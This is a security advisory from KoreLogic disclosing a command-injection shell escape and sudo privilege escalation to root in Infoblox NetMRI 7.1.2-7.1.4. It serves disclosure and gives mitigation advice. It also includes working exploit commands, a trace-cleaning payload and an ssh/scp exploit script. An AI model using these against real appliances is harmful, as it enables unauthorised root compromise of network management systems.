Infoblox NetMRI 7.1.4 Shell Escape / Privilege Escalation

`KL-001-2017-017 : Infoblox NetMRI Administration Shell Escape and Privilege Escalation  
  
Title: Infoblox NetMRI Administration Shell Escape and Privilege Escalation  
Advisory ID: KL-001-2017-017  
Publication Date: 2017.10.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-017.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Infoblox  
Affected Product: NetMRI  
Affected Version: 7.1.2 - 7.1.4  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special Elements  
used in an OS Command ('OS Command Injection'),  
CWE-272: Least Privilege Violation  
Impact: Root Access  
Attack vector: SSH  
  
2. Vulnerability Description  
  
An authenticated user can escape the management shell and  
subsequently escalate to root via insecure file ownership and  
sudo permissions.  
  
3. Technical Description  
  
The attacker begins by logging into the NetMRI CLI using a  
previously acquired or default admin account credential.  
  
$ ssh [email protected]  
NetMRI VM-AD30-5C6CE  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.  
Last login: Mon Mar 13 15:04:37 2017 from 1.3.3.6  
  
************************************************************************  
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM  
EXTENT ALLOWED BY APPLICABLE LAWS.  
************************************************************************  
  
NetMRI Administrative Shell  
---------------------------  
  
Available Commands:  
acl ftp md5sum register setup  
autoupdate grep more remoteCopy show  
cat halt netstat removedsb snmpwalk  
clear help ping removemib ssh-key  
configure installdsb provisiondisk repair supportbundle  
debug installhelpfiles quit reset telnet  
deregister installmib rdtclient restore tftpsync  
diagnostic license reboot rm top  
exit ls recalculate-spm route traceroute  
export maintenance refreshgroups set  
  
A bash command can then be encapsulated using the $()  
technique. In the case below, we simply call the bash binary.  
  
NetMRI-VM-AD30-5C6CE> ping $(/bin/bash)  
NOTE: Defaulting to MGMT network. Use -I to bind to a specific network...  
  
This places us in a new shell. This is the shell of a normal  
user who has been given access to a subset of commands using  
sudo.  
  
The admin and netmri accounts are permitted to execute various  
system commands from /bin/ and /usr/bin/ with any arguments  
sufficient to trivially escalate to root access such as /bin/cp,  
/bin/chmod, /bin/mv, /usr/sbin/find, etc., as well as some  
vendor-specific programs under /tools/. These can be used to  
escalate to root by overwriting /etc/shadow, creating a setuid  
shell, etc.  
  
In addition, numerous commands in users' home directories can be  
executed as root via sudo, such as multiple /home/admin/*  
commands runnable by user admin, and /home/reset/FactoryReset for  
user reset. One such example is runTop. runTop is a script which  
resides in the home directory of the admin user.  
  
In order to escalate privileges to root using a sudo-able command  
in a user's home directory, an attacker can move the real file,  
then create a malicious replacement and call it using sudo:  
  
[admin@NetMRI-VM-AD30-5C6CE Backup]$ cd /home/admin  
[admin@NetMRI-VM-AD30-5C6CE ~]$ mv /home/admin/runTop /home/admin/runTop.orig  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo '#!/bin/bash' > /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ echo /bin/bash >> /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ chmod a+x /home/admin/runTop  
[admin@NetMRI-VM-AD30-5C6CE ~]$ sudo /home/admin/runTop  
  
Now we have root.  
  
[root@NetMRI-VM-AD30-5C6CE ~]# id;uname -a  
uid=0(root) gid=0(root) groups=0(root)  
Linux NetMRI-VM-AD30-5C6CE 3.14.25.osib.7.1.0.20160929 #1 SMP Thu Sep 29 12:50:42 UTC 2016 x86_64 x86_64 x86_64  
GNU/Linux  
[root@NetMRI-VM-AD30-5C6CE ~]#  
  
The users admin, netmri, and reset all have similar NOPASSWD  
sudoers entries for scripts and/or binaries which the privilege  
escalation can be performed against.  
  
4. Mitigation and Remediation Recommendation  
  
There is no known remediation of this vulnerability from the  
vendor. Administrators should heavily restrict access to any  
account of any privilege which can use the ping command in  
the NetMRI CLI.  
  
Network access to management interfaces should be properly  
segmented.  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
and Hank Leininger of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.07.21 - KoreLogic requests security contact and PGP key  
from Infoblox.  
2017.07.21 - Infoblox suggests '[email protected]'  
with PGP key id 0xC4AB2799.  
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.  
2017.07.31 - 5 business days have elapsed since the vulnerability  
was reported. No response from Infoblox.  
2017.09.15 - KoreLogic requests update from Infoblox.  
2017.09.26 - 45 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.17 - KoreLogic requests an update from Infoblox.  
2017.10.18 - 60 business days have elapsed since the vulnerability  
was reported to Infoblox.  
2017.10.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
Payload file (.a)  
  
#!/bin/bash  
mv /home/admin/runTop /home/admin/runTop.orig  
echo '#!/bin/bash' > /home/admin/runTop  
echo /bin/bash >> /home/admin/runTop  
chmod a+x /home/admin/runTop  
sudo /home/admin/runTop  
/bin/rm -rf /home/admin/runTop  
mv /home/admin/runTop.orig /home/admin/runTop  
/bin/rm -rf /var/home/admin/chroot-home/Backup/.a  
  
Exploit bash script  
  
#!/bin/bash  
TARGET_HOST=$2  
TARGET_PORT=$3  
TARGET_USER=$1  
scp -P $TARGET_PORT netmri-privesc $TARGET_USER@$TARGET_HOST:.a  
ssh -p $TARGET_PORT $TARGET_USER@$TARGET_HOST 'ping $(/bin/bash .a)'  
  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`